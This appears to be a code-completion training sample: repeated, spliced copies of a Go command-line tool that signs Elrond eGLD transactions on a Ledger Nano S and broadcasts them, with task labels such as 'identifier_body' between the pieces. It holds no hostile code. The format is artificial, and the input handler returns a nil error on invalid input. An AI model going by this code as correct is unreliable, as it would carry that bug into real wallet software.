account, err := strconv.ParseUint(strAccount, 10, 32)
if err != nil {
return 0, 0, err
}
fmt.Print("Address index: ")
strAddressIndex, _ := reader.ReadString('\n')
strAddressIndex = strings.TrimSpace(strAddressIndex)
addressIndex, err := strconv.ParseUint(strAddressIndex, 10, 32)
if err != nil {
return 0, 0, err
}
return uint32(account), uint32(addressIndex), nil
}
func waitInputAndExit() {
fmt.Println("Press enter to continue...")
_, _ = fmt.Scanln()
os.Exit(1)
}
// main function
func main() {
log.SetFlags(0)
// opening connection with the Ledger device
var nanos *ledger.NanoS
nanos, err := ledger.OpenNanoS()
if err != nil {
log.Println(errOpenDevice, err)
waitInputAndExit()
}
err = getDeviceInfo(nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
fmt.Println("Nano S app version: ", nanos.AppVersion)
fmt.Printf("Contract data: %s\n\r", status[nanos.ContractData])
netConfig, err := getNetworkConfig()
if err != nil {
log.Println(errGetNetworkConfig, err)
waitInputAndExit()
}
fmt.Printf("Chain ID: %s\n\rTx version: %v\n\r",
netConfig.Data.Config.ChainID, netConfig.Data.Config.MinTransactionVersion)
if netConfig.Data.Config.ChainID != mainnetId {
ticker = "XeGLD"
}
nanos.Account, nanos.AddressIndex, err = getAccountAndAddressIndexFromUser()
if err != nil {
log.Println(errGetAccountAndAddressIndexFromUser, err)
waitInputAndExit()
}
fmt.Println("Retrieving address. Please confirm on your Ledger")
err = nanos.SetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errSetAddress, err)
waitInputAndExit()
}
senderAddress, err := nanos.GetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errGetAddress, err)
waitInputAndExit()
}
fmt.Printf("Address: %s\n\r", senderAddress)
// retrieve sender's nonce and balance
denomination = big.NewFloat(math.Pow10(netConfig.Data.Config.Denomination))
balance, nonce, err := getSenderInfo(string(senderAddress))
if err != nil || balance == nil {
log.Println(errGetBalanceAndNonce, err)
waitInputAndExit()
}
bigFloatBalance, _ := big.NewFloat(0).SetString(balance.String())
bigFloatBalance.Quo(bigFloatBalance, denomination)
strBalance := bigFloatBalance.String()
strSenderShard, err := getAddressShard(string(senderAddress), netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Sender shard: %v\n\rBalance: %v %s\n\rNonce: %v\n\r", strSenderShard, strBalance, ticker, nonce)
strReceiverAddress, bigIntAmount, data, err := getTxDataFromUser(nanos.ContractData)
if err != nil {
log.Println(err)
waitInputAndExit()
}
strReceiverShard, err := getAddressShard(strReceiverAddress, netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Receiver shard: %v\n\r", strReceiverShard)
// generate and sign transaction
var tx transaction
tx.SndAddr = string(senderAddress)
tx.RcvAddr = strReceiverAddress
tx.Value = bigIntAmount.String()
tx.Nonce = nonce
tx.GasPrice = netConfig.Data.Config.MinGasPrice
tx.Data = []byte(data)
tx.GasLimit = netConfig.Data.Config.MinGasLimit + uint64(len(data))*netConfig.Data.Config.GasPerDataByte
tx.ChainID = netConfig.Data.Config.ChainID
tx.Version = netConfig.Data.Config.MinTransactionVersion
err = signTransaction(&tx, nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
err = broadcastTransaction(tx)
if err != nil {
log.Println(err)
}
waitInputAndExit()
}
| broadcastTransaction | identifier_name |
main.go | package main
import (
"bufio"
"encoding/hex"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"log"
"math"
"math/big"
"net/http"
"os"
"strconv"
"strings"
"github.com/ElrondNetwork/ledger-elrond/testApp/ledger"
"github.com/btcsuite/btcutil/bech32"
)
const proxyHost string = "https://api.elrond.com" // https://api-testnet.elrond.com for testnet
const (
hrp = "erd"
mainnetId = "1"
)
var ticker = "eGLD"
var status = [...]string{"Disabled", "Enabled"}
var denomination *big.Float
const (
errOpenDevice = "couldn't open device"
errGetAppVersion = "couldn't get app version"
errGetConfig = "couldn't get configuration"
errSetAddress = "couldn't set account and address index"
errGetAddress = "couldn't get address"
errGetNetworkConfig = "couldn't get network config"
errGetBalanceAndNonce = "couldn't get address balance and nonce"
errEmptyAddress = "empty address"
errInvalidAddress = "invalid receiver address"
errInvalidAmount = "invalid eGLD amount"
errSigningTx = "signing error"
errSendingTx = "error sending tx"
errInvalidBalanceString = "invalid balance string"
errInvalidHRP = "invalid bech32 hrp"
errGetAddressShard = "getAddressShard error"
errGetAccountAndAddressIndexFromUser = "invalid account or address index provided by user"
)
type networkConfig struct {
Data struct {
Config struct {
ChainID string `json:"erd_chain_id"`
Denomination int `json:"erd_denomination"`
GasPerDataByte uint64 `json:"erd_gas_per_data_byte"`
LatestTagSoftwareVersion string `json:"erd_latest_tag_software_version"`
MetaConsensusGroupSize uint32 `json:"erd_meta_consensus_group_size"`
MinGasLimit uint64 `json:"erd_min_gas_limit"`
MinGasPrice uint64 `json:"erd_min_gas_price"`
MinTransactionVersion uint32 `json:"erd_min_transaction_version"`
NumMetachainNodes uint32 `json:"erd_num_metachain_nodes"`
NumNodesInShard uint32 `json:"erd_num_nodes_in_shard"`
NumShardsWithoutMeta uint32 `json:"erd_num_shards_without_meta"`
RoundDuration uint32 `json:"erd_round_duration"`
ShardConsensusGroupSize uint32 `json:"erd_shard_consensus_group_size"`
StartTime uint32 `json:"erd_start_time"`
} `json:"config"`
} `json:"data"`
}
type transaction struct {
Nonce uint64 `json:"nonce"`
Value string `json:"value"`
RcvAddr string `json:"receiver"`
SndAddr string `json:"sender"`
GasPrice uint64 `json:"gasPrice,omitempty"`
GasLimit uint64 `json:"gasLimit,omitempty"`
Data []byte `json:"data,omitempty"`
Signature string `json:"signature,omitempty"`
ChainID string `json:"chainID"`
Version uint32 `json:"version"`
}
type getAccountResponse struct {
Data struct {
Account struct {
Address string `json:"address"`
Nonce uint64 `json:"nonce"`
Balance string `json:"balance"`
} `json:"account"`
} `json:"data"`
}
// getSenderInfo returns the balance and nonce of an address
func getSenderInfo(address string) (*big.Int, uint64, error) {
req, err := http.NewRequest(http.MethodGet,
fmt.Sprintf("%s/address/%s", proxyHost, address), nil)
if err != nil {
return nil, 0, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, 0, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, 0, err
}
var accInfo getAccountResponse
err = json.Unmarshal(body, &accInfo)
if err != nil {
return nil, 0, err
}
balance, ok := big.NewInt(0).SetString(accInfo.Data.Account.Balance, 10)
if !ok {
return nil, 0, errors.New(errInvalidBalanceString)
}
return balance, accInfo.Data.Account.Nonce, nil
}
// getAddressShard returns the assigned shard of an address
func getAddressShard(bech32Address string, noOfShards uint32) (uint32, error) {
// convert sender from bech32 to hex pubkey
h, pubkeyBech32, err := bech32.Decode(bech32Address)
if err != nil {
return 0, err
}
if h != hrp {
return 0, errors.New(errInvalidHRP)
}
pubkey, err := bech32.ConvertBits(pubkeyBech32, 5, 8, false)
if err != nil {
return 0, err
}
address := hex.EncodeToString(pubkey)
n := math.Ceil(math.Log2(float64(noOfShards)))
var maskHigh, maskLow uint32 = (1 << uint(n)) - 1, (1 << uint(n-1)) - 1
addressBytes, err := hex.DecodeString(address)
if err != nil {
return 0, err
}
addr := uint32(addressBytes[len(addressBytes)-1])
shard := addr & maskHigh
if shard > noOfShards-1 {
shard = addr & maskLow
}
return shard, nil
}
// getNetworkConfig reads the network config from the proxy and returns a networkConfig object
func getNetworkConfig() (*networkConfig, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("%s/network/config", proxyHost), nil)
if err != nil {
return nil, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, err
}
netConfig := &networkConfig{}
err = json.Unmarshal(body, netConfig)
if err != nil {
return nil, err
}
return netConfig, nil
}
// getDeviceInfo retrieves various informations from Ledger
func getDeviceInfo(nanos *ledger.NanoS) error {
err := nanos.GetVersion()
if err != nil {
log.Println(errGetAppVersion)
return err
}
err = nanos.GetConfiguration()
if err != nil {
log.Println(errGetConfig)
return err
}
return nil
}
// getTxDataFromUser retrieves tx fields from user
func getTxDataFromUser(contractData uint8) (string, *big.Int, string, error) {
var err error
reader := bufio.NewReader(os.Stdin)
// read destination address
fmt.Print("Enter destination address: ")
strReceiverAddress, _ := reader.ReadString('\n')
if strReceiverAddress == "" {
log.Println(errEmptyAddress)
return "", nil, "", err
}
strReceiverAddress = strings.TrimSpace(strReceiverAddress)
_, _, err = bech32.Decode(strReceiverAddress)
if err != nil {
log.Println(errInvalidAddress)
return "", nil, "", err
}
// read amount
fmt.Printf("Amount of %s to send: ", ticker)
strAmount, _ := reader.ReadString('\n')
strAmount = strings.TrimSpace(strAmount)
bigFloatAmount, ok := big.NewFloat(0).SetPrec(0).SetString(strAmount)
if !ok {
log.Println(errInvalidAmount)
return "", nil, "", err
}
bigFloatAmount.Mul(bigFloatAmount, denomination)
bigIntAmount := new(big.Int)
bigFloatAmount.Int(bigIntAmount)
var data string
if contractData == 1 {
// read data field
fmt.Print("Data field: ")
data, _ = reader.ReadString('\n')
data = strings.TrimSpace(data)
}
return strReceiverAddress, bigIntAmount, data, nil
}
// signTransaction sends the tx to Ledger for user confirmation and signing
func signTransaction(tx *transaction, nanos *ledger.NanoS) error {
toSign, err := json.Marshal(tx)
if err != nil {
return err
}
fmt.Println("Signing transaction. Please confirm on your Ledger")
signature, err := nanos.SignTx(toSign)
if err != nil {
log.Println(errSigningTx)
return err
}
sigHex := hex.EncodeToString(signature)
tx.Signature = sigHex
return nil
}
// broadcastTransaction broadcasts the transaction in the network
func broadcastTransaction(tx transaction) error {
jsonTx, _ := json.Marshal(&tx)
resp, err := http.Post(fmt.Sprintf("%s/transaction/send", proxyHost), "",
strings.NewReader(string(jsonTx)))
if err != nil {
log.Println(errSendingTx)
return err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
log.Println(errSendingTx)
return err
}
res := string(body)
fmt.Printf("Result: %s\n\r", res)
return nil
}
// getAccountAndAddressIndexFromUser retrieves the account and address index from user
func getAccountAndAddressIndexFromUser() (uint32, uint32, error) {
reader := bufio.NewReader(os.Stdin)
fmt.Print("Account: ")
strAccount, _ := reader.ReadString('\n')
strAccount = strings.TrimSpace(strAccount)
account, err := strconv.ParseUint(strAccount, 10, 32)
if err != nil {
return 0, 0, err
}
fmt.Print("Address index: ")
strAddressIndex, _ := reader.ReadString('\n')
strAddressIndex = strings.TrimSpace(strAddressIndex)
addressIndex, err := strconv.ParseUint(strAddressIndex, 10, 32)
if err != nil {
return 0, 0, err
}
return uint32(account), uint32(addressIndex), nil
}
func waitInputAndExit() {
fmt.Println("Press enter to continue...")
_, _ = fmt.Scanln()
os.Exit(1)
}
// main function
func main() | {
log.SetFlags(0)
// opening connection with the Ledger device
var nanos *ledger.NanoS
nanos, err := ledger.OpenNanoS()
if err != nil {
log.Println(errOpenDevice, err)
waitInputAndExit()
}
err = getDeviceInfo(nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
fmt.Println("Nano S app version: ", nanos.AppVersion)
fmt.Printf("Contract data: %s\n\r", status[nanos.ContractData])
netConfig, err := getNetworkConfig()
if err != nil {
log.Println(errGetNetworkConfig, err)
waitInputAndExit()
}
fmt.Printf("Chain ID: %s\n\rTx version: %v\n\r",
netConfig.Data.Config.ChainID, netConfig.Data.Config.MinTransactionVersion)
if netConfig.Data.Config.ChainID != mainnetId {
ticker = "XeGLD"
}
nanos.Account, nanos.AddressIndex, err = getAccountAndAddressIndexFromUser()
if err != nil {
log.Println(errGetAccountAndAddressIndexFromUser, err)
waitInputAndExit()
}
fmt.Println("Retrieving address. Please confirm on your Ledger")
err = nanos.SetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errSetAddress, err)
waitInputAndExit()
}
senderAddress, err := nanos.GetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errGetAddress, err)
waitInputAndExit()
}
fmt.Printf("Address: %s\n\r", senderAddress)
// retrieve sender's nonce and balance
denomination = big.NewFloat(math.Pow10(netConfig.Data.Config.Denomination))
balance, nonce, err := getSenderInfo(string(senderAddress))
if err != nil || balance == nil {
log.Println(errGetBalanceAndNonce, err)
waitInputAndExit()
}
bigFloatBalance, _ := big.NewFloat(0).SetString(balance.String())
bigFloatBalance.Quo(bigFloatBalance, denomination)
strBalance := bigFloatBalance.String()
strSenderShard, err := getAddressShard(string(senderAddress), netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Sender shard: %v\n\rBalance: %v %s\n\rNonce: %v\n\r", strSenderShard, strBalance, ticker, nonce)
strReceiverAddress, bigIntAmount, data, err := getTxDataFromUser(nanos.ContractData)
if err != nil {
log.Println(err)
waitInputAndExit()
}
strReceiverShard, err := getAddressShard(strReceiverAddress, netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Receiver shard: %v\n\r", strReceiverShard)
// generate and sign transaction
var tx transaction
tx.SndAddr = string(senderAddress)
tx.RcvAddr = strReceiverAddress
tx.Value = bigIntAmount.String()
tx.Nonce = nonce
tx.GasPrice = netConfig.Data.Config.MinGasPrice
tx.Data = []byte(data)
tx.GasLimit = netConfig.Data.Config.MinGasLimit + uint64(len(data))*netConfig.Data.Config.GasPerDataByte
tx.ChainID = netConfig.Data.Config.ChainID
tx.Version = netConfig.Data.Config.MinTransactionVersion
err = signTransaction(&tx, nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
err = broadcastTransaction(tx)
if err != nil {
log.Println(err)
}
waitInputAndExit()
} | identifier_body | |
main.go | package main
import (
"bufio"
"encoding/hex"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"log"
"math"
"math/big"
"net/http"
"os"
"strconv"
"strings"
"github.com/ElrondNetwork/ledger-elrond/testApp/ledger"
"github.com/btcsuite/btcutil/bech32"
)
const proxyHost string = "https://api.elrond.com" // https://api-testnet.elrond.com for testnet
const (
hrp = "erd"
mainnetId = "1"
)
var ticker = "eGLD"
var status = [...]string{"Disabled", "Enabled"}
var denomination *big.Float
const (
errOpenDevice = "couldn't open device"
errGetAppVersion = "couldn't get app version"
errGetConfig = "couldn't get configuration"
errSetAddress = "couldn't set account and address index"
errGetAddress = "couldn't get address"
errGetNetworkConfig = "couldn't get network config"
errGetBalanceAndNonce = "couldn't get address balance and nonce"
errEmptyAddress = "empty address"
errInvalidAddress = "invalid receiver address"
errInvalidAmount = "invalid eGLD amount"
errSigningTx = "signing error"
errSendingTx = "error sending tx"
errInvalidBalanceString = "invalid balance string"
errInvalidHRP = "invalid bech32 hrp"
errGetAddressShard = "getAddressShard error"
errGetAccountAndAddressIndexFromUser = "invalid account or address index provided by user"
)
type networkConfig struct {
Data struct {
Config struct {
ChainID string `json:"erd_chain_id"`
Denomination int `json:"erd_denomination"`
GasPerDataByte uint64 `json:"erd_gas_per_data_byte"`
LatestTagSoftwareVersion string `json:"erd_latest_tag_software_version"`
MetaConsensusGroupSize uint32 `json:"erd_meta_consensus_group_size"`
MinGasLimit uint64 `json:"erd_min_gas_limit"`
MinGasPrice uint64 `json:"erd_min_gas_price"`
MinTransactionVersion uint32 `json:"erd_min_transaction_version"`
NumMetachainNodes uint32 `json:"erd_num_metachain_nodes"`
NumNodesInShard uint32 `json:"erd_num_nodes_in_shard"`
NumShardsWithoutMeta uint32 `json:"erd_num_shards_without_meta"`
RoundDuration uint32 `json:"erd_round_duration"`
ShardConsensusGroupSize uint32 `json:"erd_shard_consensus_group_size"`
StartTime uint32 `json:"erd_start_time"`
} `json:"config"`
} `json:"data"`
}
type transaction struct {
Nonce uint64 `json:"nonce"`
Value string `json:"value"`
RcvAddr string `json:"receiver"`
SndAddr string `json:"sender"`
GasPrice uint64 `json:"gasPrice,omitempty"`
GasLimit uint64 `json:"gasLimit,omitempty"`
Data []byte `json:"data,omitempty"`
Signature string `json:"signature,omitempty"`
ChainID string `json:"chainID"`
Version uint32 `json:"version"`
}
type getAccountResponse struct {
Data struct {
Account struct {
Address string `json:"address"`
Nonce uint64 `json:"nonce"`
Balance string `json:"balance"`
} `json:"account"`
} `json:"data"`
}
// getSenderInfo returns the balance and nonce of an address
func getSenderInfo(address string) (*big.Int, uint64, error) {
req, err := http.NewRequest(http.MethodGet,
fmt.Sprintf("%s/address/%s", proxyHost, address), nil)
if err != nil {
return nil, 0, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, 0, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, 0, err
}
var accInfo getAccountResponse
err = json.Unmarshal(body, &accInfo)
if err != nil {
return nil, 0, err
}
balance, ok := big.NewInt(0).SetString(accInfo.Data.Account.Balance, 10)
if !ok {
return nil, 0, errors.New(errInvalidBalanceString)
}
return balance, accInfo.Data.Account.Nonce, nil
}
// getAddressShard returns the assigned shard of an address
func getAddressShard(bech32Address string, noOfShards uint32) (uint32, error) {
// convert sender from bech32 to hex pubkey
h, pubkeyBech32, err := bech32.Decode(bech32Address)
if err != nil {
return 0, err
}
if h != hrp {
return 0, errors.New(errInvalidHRP)
}
pubkey, err := bech32.ConvertBits(pubkeyBech32, 5, 8, false)
if err != nil {
return 0, err
}
address := hex.EncodeToString(pubkey)
n := math.Ceil(math.Log2(float64(noOfShards)))
var maskHigh, maskLow uint32 = (1 << uint(n)) - 1, (1 << uint(n-1)) - 1
addressBytes, err := hex.DecodeString(address)
if err != nil |
addr := uint32(addressBytes[len(addressBytes)-1])
shard := addr & maskHigh
if shard > noOfShards-1 {
shard = addr & maskLow
}
return shard, nil
}
// getNetworkConfig reads the network config from the proxy and returns a networkConfig object
func getNetworkConfig() (*networkConfig, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("%s/network/config", proxyHost), nil)
if err != nil {
return nil, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, err
}
netConfig := &networkConfig{}
err = json.Unmarshal(body, netConfig)
if err != nil {
return nil, err
}
return netConfig, nil
}
// getDeviceInfo retrieves various informations from Ledger
func getDeviceInfo(nanos *ledger.NanoS) error {
err := nanos.GetVersion()
if err != nil {
log.Println(errGetAppVersion)
return err
}
err = nanos.GetConfiguration()
if err != nil {
log.Println(errGetConfig)
return err
}
return nil
}
// getTxDataFromUser retrieves tx fields from user
func getTxDataFromUser(contractData uint8) (string, *big.Int, string, error) {
var err error
reader := bufio.NewReader(os.Stdin)
// read destination address
fmt.Print("Enter destination address: ")
strReceiverAddress, _ := reader.ReadString('\n')
if strReceiverAddress == "" {
log.Println(errEmptyAddress)
return "", nil, "", err
}
strReceiverAddress = strings.TrimSpace(strReceiverAddress)
_, _, err = bech32.Decode(strReceiverAddress)
if err != nil {
log.Println(errInvalidAddress)
return "", nil, "", err
}
// read amount
fmt.Printf("Amount of %s to send: ", ticker)
strAmount, _ := reader.ReadString('\n')
strAmount = strings.TrimSpace(strAmount)
bigFloatAmount, ok := big.NewFloat(0).SetPrec(0).SetString(strAmount)
if !ok {
log.Println(errInvalidAmount)
return "", nil, "", err
}
bigFloatAmount.Mul(bigFloatAmount, denomination)
bigIntAmount := new(big.Int)
bigFloatAmount.Int(bigIntAmount)
var data string
if contractData == 1 {
// read data field
fmt.Print("Data field: ")
data, _ = reader.ReadString('\n')
data = strings.TrimSpace(data)
}
return strReceiverAddress, bigIntAmount, data, nil
}
// signTransaction sends the tx to Ledger for user confirmation and signing
func signTransaction(tx *transaction, nanos *ledger.NanoS) error {
toSign, err := json.Marshal(tx)
if err != nil {
return err
}
fmt.Println("Signing transaction. Please confirm on your Ledger")
signature, err := nanos.SignTx(toSign)
if err != nil {
log.Println(errSigningTx)
return err
}
sigHex := hex.EncodeToString(signature)
tx.Signature = sigHex
return nil
}
// broadcastTransaction broadcasts the transaction in the network
func broadcastTransaction(tx transaction) error {
jsonTx, _ := json.Marshal(&tx)
resp, err := http.Post(fmt.Sprintf("%s/transaction/send", proxyHost), "",
strings.NewReader(string(jsonTx)))
if err != nil {
log.Println(errSendingTx)
return err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
log.Println(errSendingTx)
return err
}
res := string(body)
fmt.Printf("Result: %s\n\r", res)
return nil
}
// getAccountAndAddressIndexFromUser retrieves the account and address index from user
func getAccountAndAddressIndexFromUser() (uint32, uint32, error) {
reader := bufio.NewReader(os.Stdin)
fmt.Print("Account: ")
strAccount, _ := reader.ReadString('\n')
strAccount = strings.TrimSpace(strAccount)
account, err := strconv.ParseUint(strAccount, 10, 32)
if err != nil {
return 0, 0, err
}
fmt.Print("Address index: ")
strAddressIndex, _ := reader.ReadString('\n')
strAddressIndex = strings.TrimSpace(strAddressIndex)
addressIndex, err := strconv.ParseUint(strAddressIndex, 10, 32)
if err != nil {
return 0, 0, err
}
return uint32(account), uint32(addressIndex), nil
}
func waitInputAndExit() {
fmt.Println("Press enter to continue...")
_, _ = fmt.Scanln()
os.Exit(1)
}
// main function
func main() {
log.SetFlags(0)
// opening connection with the Ledger device
var nanos *ledger.NanoS
nanos, err := ledger.OpenNanoS()
if err != nil {
log.Println(errOpenDevice, err)
waitInputAndExit()
}
err = getDeviceInfo(nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
fmt.Println("Nano S app version: ", nanos.AppVersion)
fmt.Printf("Contract data: %s\n\r", status[nanos.ContractData])
netConfig, err := getNetworkConfig()
if err != nil {
log.Println(errGetNetworkConfig, err)
waitInputAndExit()
}
fmt.Printf("Chain ID: %s\n\rTx version: %v\n\r",
netConfig.Data.Config.ChainID, netConfig.Data.Config.MinTransactionVersion)
if netConfig.Data.Config.ChainID != mainnetId {
ticker = "XeGLD"
}
nanos.Account, nanos.AddressIndex, err = getAccountAndAddressIndexFromUser()
if err != nil {
log.Println(errGetAccountAndAddressIndexFromUser, err)
waitInputAndExit()
}
fmt.Println("Retrieving address. Please confirm on your Ledger")
err = nanos.SetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errSetAddress, err)
waitInputAndExit()
}
senderAddress, err := nanos.GetAddress(nanos.Account, nanos.AddressIndex)
if err != nil {
log.Println(errGetAddress, err)
waitInputAndExit()
}
fmt.Printf("Address: %s\n\r", senderAddress)
// retrieve sender's nonce and balance
denomination = big.NewFloat(math.Pow10(netConfig.Data.Config.Denomination))
balance, nonce, err := getSenderInfo(string(senderAddress))
if err != nil || balance == nil {
log.Println(errGetBalanceAndNonce, err)
waitInputAndExit()
}
bigFloatBalance, _ := big.NewFloat(0).SetString(balance.String())
bigFloatBalance.Quo(bigFloatBalance, denomination)
strBalance := bigFloatBalance.String()
strSenderShard, err := getAddressShard(string(senderAddress), netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Sender shard: %v\n\rBalance: %v %s\n\rNonce: %v\n\r", strSenderShard, strBalance, ticker, nonce)
strReceiverAddress, bigIntAmount, data, err := getTxDataFromUser(nanos.ContractData)
if err != nil {
log.Println(err)
waitInputAndExit()
}
strReceiverShard, err := getAddressShard(strReceiverAddress, netConfig.Data.Config.NumShardsWithoutMeta)
if err != nil {
log.Println(errGetAddressShard, err)
waitInputAndExit()
}
fmt.Printf("Receiver shard: %v\n\r", strReceiverShard)
// generate and sign transaction
var tx transaction
tx.SndAddr = string(senderAddress)
tx.RcvAddr = strReceiverAddress
tx.Value = bigIntAmount.String()
tx.Nonce = nonce
tx.GasPrice = netConfig.Data.Config.MinGasPrice
tx.Data = []byte(data)
tx.GasLimit = netConfig.Data.Config.MinGasLimit + uint64(len(data))*netConfig.Data.Config.GasPerDataByte
tx.ChainID = netConfig.Data.Config.ChainID
tx.Version = netConfig.Data.Config.MinTransactionVersion
err = signTransaction(&tx, nanos)
if err != nil {
log.Println(err)
waitInputAndExit()
}
err = broadcastTransaction(tx)
if err != nil {
log.Println(err)
}
waitInputAndExit()
}
| {
return 0, err
} | conditional_block |
main.go | package main
import (
"bufio"
"encoding/hex"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"log"
"math"
"math/big"
"net/http"
"os"
"strconv"
"strings"
"github.com/ElrondNetwork/ledger-elrond/testApp/ledger"
"github.com/btcsuite/btcutil/bech32"
)
const proxyHost string = "https://api.elrond.com" // https://api-testnet.elrond.com for testnet
const (
hrp = "erd"
mainnetId = "1"
)
var ticker = "eGLD"
var status = [...]string{"Disabled", "Enabled"}
var denomination *big.Float
const (
errOpenDevice = "couldn't open device"
errGetAppVersion = "couldn't get app version"
errGetConfig = "couldn't get configuration"
errSetAddress = "couldn't set account and address index"
errGetAddress = "couldn't get address"
errGetNetworkConfig = "couldn't get network config"
errGetBalanceAndNonce = "couldn't get address balance and nonce"
errEmptyAddress = "empty address"
errInvalidAddress = "invalid receiver address"
errInvalidAmount = "invalid eGLD amount"
errSigningTx = "signing error"
errSendingTx = "error sending tx"
errInvalidBalanceString = "invalid balance string"
errInvalidHRP = "invalid bech32 hrp"
errGetAddressShard = "getAddressShard error"
errGetAccountAndAddressIndexFromUser = "invalid account or address index provided by user"
)
type networkConfig struct {
Data struct {
Config struct {
ChainID string `json:"erd_chain_id"`
Denomination int `json:"erd_denomination"`
GasPerDataByte uint64 `json:"erd_gas_per_data_byte"`
LatestTagSoftwareVersion string `json:"erd_latest_tag_software_version"`
MetaConsensusGroupSize uint32 `json:"erd_meta_consensus_group_size"`
MinGasLimit uint64 `json:"erd_min_gas_limit"`
MinGasPrice uint64 `json:"erd_min_gas_price"`
MinTransactionVersion uint32 `json:"erd_min_transaction_version"`
NumMetachainNodes uint32 `json:"erd_num_metachain_nodes"`
NumNodesInShard uint32 `json:"erd_num_nodes_in_shard"`
NumShardsWithoutMeta uint32 `json:"erd_num_shards_without_meta"`
RoundDuration uint32 `json:"erd_round_duration"`
ShardConsensusGroupSize uint32 `json:"erd_shard_consensus_group_size"`
StartTime uint32 `json:"erd_start_time"`
} `json:"config"`
} `json:"data"`
}
type transaction struct {
Nonce uint64 `json:"nonce"`
Value string `json:"value"`
RcvAddr string `json:"receiver"`
SndAddr string `json:"sender"`
GasPrice uint64 `json:"gasPrice,omitempty"`
GasLimit uint64 `json:"gasLimit,omitempty"`
Data []byte `json:"data,omitempty"`
Signature string `json:"signature,omitempty"`
ChainID string `json:"chainID"`
Version uint32 `json:"version"`
}
type getAccountResponse struct {
Data struct {
Account struct {
Address string `json:"address"`
Nonce uint64 `json:"nonce"`
Balance string `json:"balance"`
} `json:"account"`
} `json:"data"`
}
// getSenderInfo returns the balance and nonce of an address
func getSenderInfo(address string) (*big.Int, uint64, error) {
req, err := http.NewRequest(http.MethodGet,
fmt.Sprintf("%s/address/%s", proxyHost, address), nil)
if err != nil {
return nil, 0, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, 0, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, 0, err
}
var accInfo getAccountResponse
err = json.Unmarshal(body, &accInfo)
if err != nil {
return nil, 0, err
}
balance, ok := big.NewInt(0).SetString(accInfo.Data.Account.Balance, 10)
if !ok {
return nil, 0, errors.New(errInvalidBalanceString)
}
return balance, accInfo.Data.Account.Nonce, nil
}
// getAddressShard returns the assigned shard of an address
func getAddressShard(bech32Address string, noOfShards uint32) (uint32, error) {
// convert sender from bech32 to hex pubkey
h, pubkeyBech32, err := bech32.Decode(bech32Address)
if err != nil {
return 0, err
}
if h != hrp {
return 0, errors.New(errInvalidHRP)
}
pubkey, err := bech32.ConvertBits(pubkeyBech32, 5, 8, false)
if err != nil {
return 0, err
}
address := hex.EncodeToString(pubkey)
n := math.Ceil(math.Log2(float64(noOfShards)))
var maskHigh, maskLow uint32 = (1 << uint(n)) - 1, (1 << uint(n-1)) - 1
addressBytes, err := hex.DecodeString(address)
if err != nil {
return 0, err
}
addr := uint32(addressBytes[len(addressBytes)-1])
shard := addr & maskHigh
if shard > noOfShards-1 {
shard = addr & maskLow
}
return shard, nil
}
// getNetworkConfig reads the network config from the proxy and returns a networkConfig object
func getNetworkConfig() (*networkConfig, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("%s/network/config", proxyHost), nil)
if err != nil {
return nil, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, err
}
netConfig := &networkConfig{}
err = json.Unmarshal(body, netConfig)
if err != nil {
return nil, err
}
return netConfig, nil
}
// getDeviceInfo retrieves various informations from Ledger
func getDeviceInfo(nanos *ledger.NanoS) error {
err := nanos.GetVersion()
if err != nil {
log.Println(errGetAppVersion)
return err
}
err = nanos.GetConfiguration()
if err != nil {
log.Println(errGetConfig)
return err
}
return nil
}
// getTxDataFromUser retrieves tx fields from user
func getTxDataFromUser(contractData uint8) (string, *big.Int, string, error) {
var err error
reader := bufio.NewReader(os.Stdin)
// read destination address
fmt.Print("Enter destination address: ")
strReceiverAddress, _ := reader.ReadString('\n')
if strReceiverAddress == "" {
log.Println(errEmptyAddress)
return "", nil, "", err
}
